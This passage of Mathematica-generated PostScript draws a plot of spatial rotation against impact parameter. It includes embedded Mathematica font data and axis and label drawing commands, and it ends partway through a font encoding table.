154.361 L +307.36 154.384 L +307.724 154.406 L +308.088 154.428 L +308.453 154.45 L +308.817 154.472 L +309.181 154.493 L +309.546 154.515 L +309.91 154.536 L +310.274 154.557 L +310.639 154.578 L +311.003 154.598 L +311.367 154.618 L +311.732 154.639 L +312.096 154.659 L +312.461 154.678 L +312.825 154.698 L +313.189 154.717 L +313.554 154.737 L +313.918 154.756 L +314.282 154.775 L +314.647 
+[Mathematica-generated EPS plot data omitted: curve path segments, frame with x-axis ticks labeled 0–5 and y-axis tick 0 in Times-Roman-MISO, and the embedded eexec-encoded Mathematica1 font program (Wolfram Research, 1996-2001)]
+62960CC1D29ECEF9E61BAC20E92F13C49078E7F1562C9D7C01C2B300ECD6ADCAC9AA0C1F1BA30401 +0573F79D158C66D91A8D987C5239C9D4FEED1DC5C9586C4129C33E7C737C624EE9BD1EDE38E9F72A +78DC19E144B5AABF3B0FB72216815E371A5D6452684965CB7208B87CE5A27E444820E03F80AD2DF4 +E280D25D9BDE41E719BB2C939E25B7965DB162CA8665CBFE65DFDC7992A508D54FE4EE8454C11482 +7186A280D3D9EDF397640A809E3646675AB6621B9CDF42808E2F19859AC975CF70F41D2B3D22F8E0 +C180126F4A12122B207A150BC8E1819962DAEBB821DE59B7EEF8FF9219474597AF859E353B4B713F +5F1350F4049DCE99627492E396038B10A2F8E82AB679F65BE14A166E4502921BA44CCFE04E5DD3FE +B04BA47C3F7A3E7DBF7D55328AD1E96092C73EDB16C3325537295DF768E2633D01304EA0B01379AA +DAFE6CCA2AB3E246768C5AC841A458A2F69141A9A9D716D129B26643F1BBC95D8CD0ED44148F7C6A +F370201E454F4AFF7C11A8080508FEDE242343E7ADDD5A8AAF079C50765A79BD25FBBDC59EDF980F +FE0B60435692C49D20AC22F8BD1FCA3F3D8200CA26D61A30212558B54671E63BC09776A3AE7A906F +CA63281F080A00500C42C02B8F82357A3EBF572CFC4BEBA3FE86537DDDF23A861C240A31778A131E +F638C1DBB7E87A45487C092D23FD9FB2C162C3253636ED263B141178FCA9F2D5BE2D81F99B2872C4 +B3C08749CE18C9C00E75DA6B3E4C6A6DD79EBA731618EF5B5E767BB40429D8FEEC6ABFE9975746FB +3A82A03A07B7D0DA8BAECFD1F72AFE17EB0C0CF100A2D48F4449A42C482BB1D64C19F8FEA73F5BA1 +8FC9BFEE3F640C39C081669A9B0EE3FF6B2BDC0A726301EF0E2259E65BE59275C76E7A3F1C76C3A3 +3AD0E2F79198DCA39C482B4E1196238DBA937692CF319436830BBF441C0A8A04161DC0814B5DF049 +83099439EF421B6D37D351D4A988A8DFE93D796B2E8B2564C602F79E6162F56F933196A0DCE91051 +600BAFFD9D439A91F17C20CD6A9104B553D823A0317E3C8344E9F0B2560AD583BF876AE307892500 +2177AF61BDBD745CEC2B2A7931D27423D2667584AE0D6CAA2B281EB9271ADE86C493791AC9A2265B +8324F764D20DE65F6267439F1574DB02C600E771D3C743D420FA6F8BF01A977B91AF035E0D5412AB +0B85D6ED3ED9D0345ED434F9B95FD911A9D3828CD162686E6ECCD2B6A5B1104F0E6838AAC7FB3FC7 +09F08F8E82B4BFCB55D8984771F9F4D339EE7FF391448C7807A436A78B6A487D3A5A86F314B302FA +C5BE1C1DB9844F975619D615D1C7A20EC2B144797E0648CF5C044C8DD1699EEA3AC9D7E3BAA54A85 +11A932623D5ED3F0A9C3028CA439AC395F58DEAF1C0354A169D9AC7F380900D9828C3ECBB975F6FE +6BD79EA4BEA9B71F3A9B1D2EAF8F1E475B4FB99758192EBCDA21B47EA33F57C58E904DA260C801AE +CF457C84592B81CFA96C10E448D705D24871F3D1AD1FE004406C8070A54FA3747788C5B55E9462E6 +F51378BF3F848360542CAD2D5FF9EDAC84C164DFEC115A2F3D873760EAE58CC8F361B37E6CE076EF +325A1C54DFF84DB95DB7DB5B56C48ED15C5426E6153D8A94B1A35B22EAB1D7B871097DF12C093BA5 +538957AB7D0AB2E39A2D1AECB91F0A693B8F6A00601929B6C55AAE8A227CAB6404FEBCC8BC4EEEE0 +ADD4CFD7DEC225170A0063457918B9875AD7F022A8F9932ADE316E4126EAB75C1D0B2B9F44E85F1C +54755D1301345665EA630C8E885A8D9AB069DEA2CC6D12E4A0BF6E80C3AE12BC7ABE507422A5D92B +65F70B4A472DD945EBB960880EC4C34E4C206C260FDF86A997D7D399A0219A51E6F8BC1189EC0ED0 +B8686F0243BFAFD829979747442AB1DA8282F10F4C37C4E6C88D231460DA3BF34C23A4755E2F8F21 +F6D138C86B6091CB3BCE5ED170242C4CC87C010FE63DA9A2ECBDD85311DA8572AD67E40F744D2EC9 +6607701D9790574F051C859EF29291AFA301C809E0A5513DF9A7FC2DB1776DBD4A2CB622BD17811B +C0E584A8D89D4BEB17C2D0AA8BF31CD7E2B36C0E1888409788E30EAC2E46AFA1CFE457D3A19C28C5 +80669CB82CF36BF40DFAFED78F99A5D5DF189CE293413FFBA9E8D2457986C68483242AD767D5F026 +1CE303153C35D5DEB1789448088B51C48A9B8E903BBC69ED7FB0129CCE33A0337198F11DBA94FDAE +AD74BBC5E519F559094E15B03AF3EFA89DC38B4278C68D2AEEEBE4B28B351D7B72F52D94480D8CBC +06544645F20800B8284A4E7C8FAD59D0AA8EC8EC0551912CBC62694A5DD15C469BBE614FB187C084 +838D676E5A1CC8DFA8676758EB7D53FD2BA8F1C434F4F70AED8F2CE27EED2F6A82E20E30EACF9BF0 +CE28B4BF7D556815A887D777B7D75F60D2C410AA2D378B7BFAA6C3A5BF0A5EF80D3E35A0CF393A5E 
+BC27A895D712C6F004F1A03F9FCF493973F33E6FB106407DFD992AB0E9E36EF395663A6EEFFD71BB +2DAD9DFE6AA4685F307B8FD69BB2F74E672666414A71FA479B37D3DEF6AEAF80FA14821C65F7ABBE +5CC6DD49002216E23B3D22C282F3DE0077EA81017E79D8C3BDB61EC031CFB13FA981120A6C518F4B +4C39C9DD5AC6EDA29ABA527C9948BC3162EF65E8251C9D4E3494C6A51A41D489F8BC89250128EBD7 +0EFD01B9F03C40B6E0384364F2571F7D969016A959E4243D7AB728F0F030B8E2FB456D8E47A85898 +313B0E91C68C7A8A7226603427AC6DCB5C69924FD026E90CB0EE89AC42D874BB15AFC981079E9DC7 +1271C3E461265AF327D4AAB4AEFAB6A9DC3F84DCE7C7868D4719006344B9055C8BA952A2250B8041 +E5EF519BB788201124BE90AECAC2293A310D9565E1EA4AEB99F7ED7106649169E8EBF3DCB210706A +F2FA65158D3059DFBD7AB5B00DBB06B016F73FEDB3AE1C1CC03BC2D94B143BFBD759338EB181B1F6 +841F7B539D8D126FC5B31B244A3A00ABBB121A98F73314D1F1683F513C3CCC9A0C2180824ACE5D45 +E454062CE1217F7AFBDC60A6022B0134EDA6C5D787DE8A5925BEB374F64D612329B9AC17B6EC03F8 +56CFEE502C1FC3AAC7B6F251E8DE4147DCB1580185C406F38E6B729307EADFF6D7A0E824C9830093 +F0C4FECEEFC7FF839306FEFEB780FFBD8879F22AFDADCA4C0767B8EEAE5DB869D7BD91355F0255E1 +CAC68A81A276967F233624DE0D2082B89E2C2D1DB0F8BE0B2BD7051C4DE9B1564AA6CBA03E50386F +D685943D1EDDF5BE0EB34418C48E5EA645CBA552A0444B254E82E9E84A5B7BD0064D5EA87B1716C1 +4EF7FD14E2187FCE16FF6ECBC0A6588B30B4329626F024BDBA65457028668BC6750A4DD668D017CC +EF35CD9CF45EC73885FC91B8AD78920919B4747A710D25BB850B558C5CCF7170C20012DD0F2874A6 +699DF53EDC6C75716A5B6B06C98F4904BAD22B18C77B3EEF32DE3F45A8AC12383DA16DF6F06CD923 +D344CFC2253ECF97A52F2DC6A22539231E29A324F851265BA82BE566E42167247CEBD914EBE42EAB +E189E74FE1FF17ADA8A5F47DC9866CF86694DEE28EED333B0A8AE380557820E3F1D32B05AE27FFE1 +68267FADD310C4EE550F71704EF71F4C669952F30E485AF37561884066C0E3425C748BBAC77CC7A9 +87EC336B8BEBA44358BEA4ECFEA32494A8006E9852C4BFCB1C0F00ACC247F1F8E3F3B34539C67638 +64527F9F885132DCACBFCB1DC80EE3B2A711145DDA1D3B5F83144E2CD698D43A02B0DEB706C78D75 +A24FA39B9374E1155969FAD7D5FB477F4C3C7440DBFE1BD1DC877360E8690A6D3A64EF0A1313A520 +C49320295302227CE5625E134EA442A537505D206EE46E7E218BDA38F7B6BA124ACA0E949725CEEB +961EF8B0727E3A78287E61E65A84AC14D1014A213259A48F04C634C1F04C73B4110D0DB491250CCD +7DAE323CC8BD29BEF605DD92AA5480009DEAD1256E5C9FFB18362D63B022C2A378D15ADE2C6AE603 +1DF385CF090226F0AF889464584A9EA63B884453DE231058C5661C4F7DCF7505D7B1E48C78AA5799 +8FF39084FFF1CD18CB2989D867F2E085B291FE52367B4E8667E5CDA4F41DDBC7129DA5BDC39549E0 +8B67D9C9E4C332D91FE261728521245CBF51870F24C42F5814F393719A9E126C5693C0E776E4D8F3 +0F0288537B8E9A7C5DA4F931FC83F96A1950B1DF26C0448B646D3BF42C0429E2BD0164703FC71833 +19DDEA75CE65D9DFFE8369787FE664306D843421C2C0C3A5B210E823F8366161A96CA88D95FD6486 +5F9E5B0D53DCEE4A98AC10A8FF1BC34A46DB6016E973C9FA298D3F58228E3D9FCCCF9632556CE2E7 +F9C81E05FDB0FC1071E69A4C158E742D0B8939CA3DE33A4BE8D01D679C81C6BA9CF396A6768CA626 +05D796AA5C323E3A6208F2DA5000FC4462ED81AD0044D9959E40E4764562ADA76E33EC63271966F1 +7A13AD376A54FFA40FA247896A22C1C4A4CE51094CA1892A0B9904EB762839AAE1EDB5A0A5A69343 +CCA45F88F61926B23E6C85688862B1D10F1ED827FCCE2A427E49D960DBEE0D39EDE08D2565C6F5AD +66CA83DAC1467C38F742132F715DA7E9757A5D067FDB4A8859D148473F302BF6ECB9B7EA5C0DF851 +8F58D4D076625B92BC8201028064950D70CD40492DA83B98FFD79BD3DCD9CEE95178B6DEA9AB10B3 +4C61A74B49C3697CF714F56A9B1E366B04500C9A67704AF6F721851EA4566B96E220E7B526873F94 +E6013EA8C489639D291167BCAEFB661C96C27DC7BCD5B317C1F101CD8DF2FB29F6162B5ECE903C0D +5570C8C6325F05218850E4A5B5F94C7CE334BADDFC5DB98EF5333B4A92129F41D046D0F5EB6F342C +F362BC8E45511FCF328E2CE2D4C579516307AEC400BA207071C887F5185AF536A6827307D7698095 
+E8A6F8C19812A11C32AD207FBC353172C8DF626C5C05CD24C171B3C8DAB270A74AC48E35F0A8849C +E0934B93D56C93599F5235EC441B5232257C4C6767C7B5A35830010E60E56AFBE9199B42E725A216 +C49D45A3C554767DF192F04D1A192D5CE196831EB7A56201A4A96CD44DD084729774334F698E1902 +614405347A37A4C753C0211D7F24D5265CF033E3C4D30E61886CF781D2AC30385E6021A892AB116D +1F5505635BF5C915D0300ACA8AC32CAA0F3639550C4AEB390DA7B86E53B6BB0E4819626757BA9986 +BCA4B4B18F6BF3706577A3BE146F2585025D5A36EB14E587C5469EEEB622D31FD32EBFA812B9CCDC +CFF7D17D00D9F21BF8871661F20E89A25A4543068EC509D0DF7DEA2A24FF68957943BE0FC7BD319D +92A575E12E6FB8112D72A100FEF3EE85972304BBE07FC1026CCC068E8A414F641116E51F76009C5A +F9E664BCCF93C943CFF2115235BB3290F935AA3FAB4F2E73FCDB9FA5E1866EFE278FFE7EA9DD6F89 +38CD5E5F4F31F6C659AF7EFF5B291AFB86521678B42C99275024EDAD04E5929D201A36F4A6C4DCD7 +2E349D6B9A1F90B123DEDE3DA50EDF929F9285747CD504C8F4A73D522F312D623BD65A35419C0729 +30976129B2D99B32D1DEDD81D64F7879CEDDFF04BBBF1286E07BCE651E2DEC190DFB9D25F3C1EEC8 +D7277752BB7CCC313A0FEEBF0EFFA2A189861AD4EA13AD4FDBD5160DC273F12525815F0D693C1413 +AFE4FBE09BCBD71E16C33E6CF8D18732447FFDCC2E4AF9E270D725C1D262D96E72538CA3309BCAF2 +35A3FAFAB27D265C583E6F6F062B555C97DFD89AC46E6154670ADCA13FD99F7A4B9B8BB224D43764 +8CC9DB76E177F562862C912D8CBC248A4C628FF2D0C9688611CED3DFB89064B988F16655633B7CC7 +AFAE34B2937528EA0814ED245D6B0D2AEF87A5B63E2BD7E4F7D9CFE372C295A0891F97C3855C97EC +C03C7C2A231704BED419612255F8B2C9262D48CB4FB46D63CC9697A210FA9D7BFC3BAB7E46172D3F +52A4AF9C4114BC72A5C7CBA042FA633AFD5E404F29408D4485837E55E6F9702F04C7AB410C351039 +6A78C8672F8EAD53BB9CBCED63FB9E72E7238CC88FB4E7C48C3DE3E4B80E277B952727916A4127A2 +5CC1413C390F4DAFD5253B07BC96DAE8CF4DA08330DEE580CBC1E12B75A661819E96B018D47A8B71 +B6BFAFC5E3CBFE68E5193417B6E730E6A2820838D22049BE6BB64B74AA13779D46519965ED80D5FC +30B0A6F73D26DEBD8150B3D27B3F135F608D59BB1632AD9C2E11177FAF54CBD1C4E58D58C395BAE8 +AD7C7AEEB0E1C3F0C0B7A5E7142E9A1DCCC8B4EF56C319D4A4F750857D2FD180F871772B9CC69FB9 +B222F83C3ACCB66125AF6848B2EFDCE3D2284FA5844641FB32F701FBF32F1D2F2E2233B66E36CCD1 +49FCB3FCDB6EA04367D11624717D73D9128EA7D9AABB8658BE9E9986E532 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +cleartomark{restore}if + +%%EndFont +%%EndResource +11.52 /Mathematica1 Msf +0.75 10.5 m +(p) N +P +[1 0 0 1 -61.69 -151.566 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 105.842 m +73.497 105.842 L +s +P +p +np 52 98 m +52 113 L +69 113 L +69 98 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 53.44 99.467 ] concat +1 w +[ ] 0 setdash +p +np -2.44 -2.467 m +-2.44 14.533 L +16.56 14.533 L +16.56 -2.467 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(2) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -53.44 -99.467 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 53.742 m +73.497 53.742 L +s +P +p +np 52 46 m +52 61 L +69 61 L +69 46 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 
setlinejoin +10 setmiterlimit +[1 0 0 1 53.44 47.367 ] concat +1 w +[ ] 0 setdash +p +np -2.44 -2.367 m +-2.44 14.633 L +16.56 14.633 L +16.56 -2.367 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(3) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -53.44 -47.367 ] concat +1 w +[ ] 0 setdash +P +P +1 g +[ ] 0 setdash +p +0 setlinecap +78.19 2.952 m +78.19 5.849 L +s +P +p +0 setlinecap +92.764 2.952 m +92.764 4.69 L +s +P +p +0 setlinecap +107.338 2.952 m +107.338 4.69 L +s +P +p +0 setlinecap +121.911 2.952 m +121.911 4.69 L +s +P +p +0 setlinecap +136.485 2.952 m +136.485 4.69 L +s +P +p +0 setlinecap +151.058 2.952 m +151.058 5.849 L +s +P +p +0 setlinecap +165.632 2.952 m +165.632 4.69 L +s +P +p +0 setlinecap +180.205 2.952 m +180.205 4.69 L +s +P +p +0 setlinecap +194.779 2.952 m +194.779 4.69 L +s +P +p +0 setlinecap +209.353 2.952 m +209.353 4.69 L +s +P +p +0 setlinecap +223.926 2.952 m +223.926 5.849 L +s +P +p +0 setlinecap +238.5 2.952 m +238.5 4.69 L +s +P +p +0 setlinecap +253.073 2.952 m +253.073 4.69 L +s +P +p +0 setlinecap +267.647 2.952 m +267.647 4.69 L +s +P +p +0 setlinecap +282.22 2.952 m +282.22 4.69 L +s +P +p +0 setlinecap +296.794 2.952 m +296.794 5.849 L +s +P +p +0 setlinecap +311.367 2.952 m +311.367 4.69 L +s +P +p +0 setlinecap +325.941 2.952 m +325.941 4.69 L +s +P +p +0 setlinecap +340.515 2.952 m +340.515 4.69 L +s +P +p +0 setlinecap +355.088 2.952 m +355.088 4.69 L +s +P +p +0 setlinecap +369.662 2.952 m +369.662 5.849 L +s +P +p +0 setlinecap +384.235 2.952 m +384.235 4.69 L +s +P +p +0 setlinecap +398.809 2.952 m +398.809 4.69 L +s +P +p +0 setlinecap +413.382 2.952 m +413.382 4.69 L +s +P +p +0 setlinecap +427.956 2.952 m +427.956 4.69 L +s +P +p +0 setlinecap +442.53 2.952 m +442.53 5.849 L +s +P +p +0 setlinecap +450.12 210.041 m +447.223 210.041 L +s +P +p +np 451 203 m +451 217 L +459 217 L +459 203 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 203.666 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -1.666 m +-2.28 14.334 L +7.72 14.334 L +7.72 -1.666 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +1 g +0 10.5 m +(0) N +P +[1 0 0 1 -452.28 -203.666 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +450.12 157.941 m +447.223 157.941 L +s +P +p +np 451 151 m +451 165 L +460 165 L +460 151 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 151.566 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -1.566 m +-2.28 14.434 L +8.72 14.434 L +8.72 -1.566 L +cp +clip np +11.52 /Mathematica1 Msf +1 g +0.75 10.5 m +(p) N +P +[1 0 0 1 -452.28 -151.566 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +450.12 105.842 m +447.223 105.842 L +s +P +p +np 451 98 m +451 113 L +468 113 L +468 98 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 99.467 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -2.467 m +-2.28 14.533 L +16.72 14.533 L +16.72 -2.467 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +1 g +0 10.5 m +(2) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -452.28 -99.467 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +450.12 53.742 m +447.223 53.742 L +s +P +p +np 451 46 m +451 61 L +468 61 L +468 
46 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 47.367 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -2.367 m +-2.28 14.633 L +16.72 14.633 L +16.72 -2.367 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +1 g +0 10.5 m +(3) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -452.28 -47.367 ] concat +1 w +[ ] 0 setdash +P +P +p +np 210 257 m +210 272 L +310 272 L +310 257 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 211.235 257.578 ] concat +1 w +[ ] 0 setdash +p +np -2.235 -1.578 m +-2.235 15.422 L +99.765 15.422 L +99.765 -1.578 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +10.08 /Times-Roman-MISO Msf +p +0 9 m +(I) N +P +p +3.75 9 m +(m) N +P +p +12.75 9 m +(p) N +P +p +19.5 9 m +(a) N +P +p +24.75 9 m +(c) N +P +p +30 9 m +(t) N +P +p +36.75 9 m +(p) N +P +p +43.5 9 m +(a) N +P +p +48.75 9 m +(r) N +P +p +53.25 9 m +(a) N +P +p +58.5 9 m +(m) N +P +p +67.5 9 m +(e) N +P +p +72.75 9 m +(t) N +P +p +76.5 9 m +(e) N +P +p +81.75 9 m +(r) N +P +86.25 9 m +(,) N +92.25 9 m +(b) N +P +[1 0 0 1 -211.235 -257.578 ] concat +1 w +[ ] 0 setdash +P +P +p +np 34 75 m +34 165 L +49 165 L +49 75 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[0 -1 1 0 35.28 164.105 ] concat +1 w +[ ] 0 setdash +p +np -1.895 -2.28 m +-1.895 14.72 L +90.105 14.72 L +90.105 -2.28 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +10.08 /Times-Roman-MISO Msf +p +0 9 m +(S) N +P +p +6 9 m +(p) N +P +p +12.75 9 m +(a) N +P +p +18 9 m +(t) N +P +p +21.75 9 m +(i) N +P +p +24.75 9 m +(a) N +P +p +30 9 m +(l) N +P +p +36 9 m +(r) N +P +p +40.5 9 m +(o) N +P +p +46.5 9 m +(t) N +P +p +50.25 9 m +(a) N +P +p +55.5 9 m +(t) N +P +p +59.25 9 m +(i) N +P +p +62.25 9 m +(o) N +P +p +68.25 9 m +(n) N +P +75 9 m +(,) N +10.08 /Mathematica1 Msf +81.75 9 m +(c) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +10.08 /Times-Roman-MISO Msf +P +[0 1 -1 0 164.105 -35.28 ] concat +1 w +[ ] 0 setdash +P +P +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +p +np 117 136 m +117 152 L +155 152 L +155 136 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 118.485 136.705 ] concat +1 w +[ ] 0 setdash +p +np -2.485 -1.705 m +-2.485 16.295 L +37.515 16.295 L +37.515 -1.705 L +cp +clip np +p +np -0.485 0.295 m +-0.485 13.295 L +35.515 13.295 L +35.515 0.295 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -2.485 -1.705 m +-2.485 15.295 L +37.515 15.295 L +37.515 -1.705 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +%%BeginResource: font Mathematica2 +%%BeginFont: Mathematica2 +%!PS-AdobeFont-1.0: Mathematica2 001.000 +%%CreationDate: 8/28/01 at 12:01 AM +%%VMusage: 1024 29061 +% Mathematica typeface design by Andre Kuzniarek. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. 
[Font version 2.00] +% ADL: 800 200 0 +%%EndComments +FontDirectory/Mathematica2 known{/Mathematica2 findfont dup/UniqueID known{dup +/UniqueID get 5095653 eq exch/FontType get 1 eq and}{pop false}ifelse +{save true}{false}ifelse}{false}ifelse +20 dict begin +/FontInfo 16 dict dup begin + /version (001.000) readonly def + /FullName (Mathematica2) readonly def + /FamilyName (Mathematica2) readonly def + /Weight (Medium) readonly def + /ItalicAngle 0 def + /isFixedPitch false def + /UnderlinePosition -133 def + /UnderlineThickness 20 def + /Notice (Mathematica typeface design by Andre Kuzniarek. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. [Font version 2.00]) readonly def + /em 1000 def + /ascent 800 def + /descent 200 def +end readonly def +/FontName /Mathematica2 def +/Encoding 256 array +dup 0/NUL put +dup 1/Eth put +dup 2/eth put +dup 3/Lslash put +dup 4/lslash put +dup 5/Scaron put +dup 6/scaron put +dup 7/Yacute put +dup 8/yacute put +dup 9/HT put +dup 10/LF put +dup 11/Thorn put +dup 12/thorn put +dup 13/CR put +dup 14/Zcaron put +dup 15/zcaron put +dup 16/DLE put +dup 17/DC1 put +dup 18/DC2 put +dup 19/DC3 put +dup 20/DC4 put +dup 21/onehalf put +dup 22/onequarter put +dup 23/onesuperior put +dup 24/threequarters put +dup 25/threesuperior put +dup 26/twosuperior put +dup 27/brokenbar put +dup 28/minus put +dup 29/multiply put +dup 30/RS put +dup 31/US put +dup 32/Space put +dup 33/Radical1Extens put +dup 34/Radical2 put +dup 35/Radical2Extens put +dup 36/Radical3 put +dup 37/Radical3Extens put +dup 38/Radical4 put +dup 39/Radical4Extens put +dup 40/Radical5 put +dup 41/Radical5VertExtens put +dup 42/Radical5Top put +dup 43/Radical5Extens put +dup 44/FixedFreeRadical1 put +dup 45/FixedFreeRadical2 put +dup 46/FixedFreeRadical3 put +dup 47/FixedFreeRadical4 put +dup 48/TexRad1 put +dup 49/TexRad2 put +dup 50/TexRad3 put +dup 51/TexRad4 put +dup 52/TexRad5 put +dup 53/TexRad5VertExt put +dup 54/TexRad5Top put +dup 55/TexRadExtens put +dup 56/LBrace1 put +dup 57/LBrace2 put +dup 58/LBrace3 put +dup 59/LBrace4 put +dup 60/RBrace1 put +dup 61/RBrace2 put +dup 62/RBrace3 put +dup 63/RBrace4 put +dup 64/LBracket1 put +dup 65/LBracket2 put +dup 66/LBracket3 put +dup 67/LBracket4 put +dup 68/RBracket1 put +dup 69/RBracket2 put +dup 70/RBracket3 put +dup 71/RBracket4 put +dup 72/LParen1 put +dup 73/LParen2 put +dup 74/LParen3 put +dup 75/LParen4 put +dup 76/RParen1 put +dup 77/RParen2 put +dup 78/RParen3 put +dup 79/RParen4 put +dup 80/DblLBracket1 put +dup 81/DblLBracket2 put +dup 82/DblLBracket3 put +dup 83/DblLBracket4 put +dup 84/DblRBracket1 put +dup 85/DblRBracket2 put +dup 86/DblRBracket3 put +dup 87/DblRBracket4 put +dup 88/LAngleBracket1 put +dup 89/LAngleBracket2 put +dup 90/LAngleBracket3 put +dup 91/LAngleBracket4 put +dup 92/RAngleBracket1 put +dup 93/RAngleBracket2 put +dup 94/RAngleBracket3 put +dup 95/RAngleBracket4 put +dup 96/LCeiling1 put +dup 97/LCeiling2 put +dup 98/LCeiling3 put +dup 99/LCeiling4 put +dup 100/LFloor1 put +dup 101/LFloor2 put +dup 102/LFloor3 put +dup 103/LFloor4 put +dup 104/LFlrClngExtens put +dup 105/LParenTop put +dup 106/LParenExtens put +dup 107/LParenBottom put +dup 108/LBraceTop put +dup 109/LBraceMiddle put +dup 110/LBraceBottom put +dup 111/BraceExtens put +dup 112/RCeiling1 put +dup 113/RCeiling2 put +dup 114/RCeiling3 put +dup 115/RCeiling4 put +dup 116/RFloor1 put +dup 117/RFloor2 put +dup 118/RFloor3 put +dup 119/RFloor4 put +dup 120/RFlrClngExtens put +dup 121/RParenTop put +dup 
122/RParenExtens put +dup 123/RParenBottom put +dup 124/RBraceTop put +dup 125/RBraceMiddle put +dup 126/RBraceBottom put +dup 127/DEL put +dup 128/LBracketTop put +dup 129/LBracketExtens put +dup 130/LBracketBottom put +dup 131/RBracketTop put +dup 132/RBracketExtens put +dup 133/RBracketBottom put +dup 134/DblLBracketBottom put +dup 135/DblLBracketExtens put +dup 136/DblLBracketTop put +dup 137/DblRBracketBottom put +dup 138/DblRBracketExtens put +dup 139/DblRBracketTop put +dup 140/LeftHook put +dup 141/HookExt put +dup 142/RightHook put +dup 143/Radical1 put +dup 144/Slash1 put +dup 145/Slash2 put +dup 146/Slash3 put +dup 147/Slash4 put +dup 148/BackSlash1 put +dup 149/BackSlash2 put +dup 150/BackSlash3 put +dup 151/BackSlash4 put +dup 152/ContourIntegral put +dup 153/DblContInteg put +dup 154/CntrClckwContInteg put +dup 155/ClckwContInteg put +dup 156/SquareContInteg put +dup 157/UnionPlus put +dup 158/SquareIntersection put +dup 159/SquareUnion put +dup 160/LBracketBar1 put +dup 161/LBracketBar2 put +dup 162/LBracketBar3 put +dup 163/LBracketBar4 put +dup 164/RBracketBar1 put +dup 165/RBracketBar2 put +dup 166/RBracketBar3 put +dup 167/RBracketBar4 put +dup 168/ContourIntegral2 put +dup 169/DblContInteg2 put +dup 170/CntrClckwContInteg2 put +dup 171/ClckwContInteg2 put +dup 172/SquareContInteg2 put +dup 173/UnionPlus2 put +dup 174/SquareIntersection2 put +dup 175/SquareUnion2 put +dup 176/DblLBracketBar1 put +dup 177/DblLBracketBar2 put +dup 178/DblLBracketBar3 put +dup 179/DblLBracketBar4 put +dup 180/DblRBracketBar1 put +dup 181/DblRBracketBar2 put +dup 182/DblRBracketBar3 put +dup 183/DblRBracketBar4 put +dup 184/ContourIntegral3 put +dup 185/DblContInteg3 put +dup 186/CntrClckwContInteg3 put +dup 187/ClckwContInteg3 put +dup 188/SquareContInteg3 put +dup 189/UnionPlus3 put +dup 190/SquareIntersection3 put +dup 191/SquareUnion3 put +dup 192/DblBar1 put +dup 193/DblBar2 put +dup 194/DblBar3 put +dup 195/DblBar4 put +dup 196/BarExt put +dup 197/DblBarExt put +dup 198/OverCircle put +dup 199/Hacek put +dup 200/VertBar1 put +dup 201/VertBar2 put +dup 202/Nbspace put +dup 203/VertBar3 put +dup 204/VertBar4 put +dup 205/FIntegral put +dup 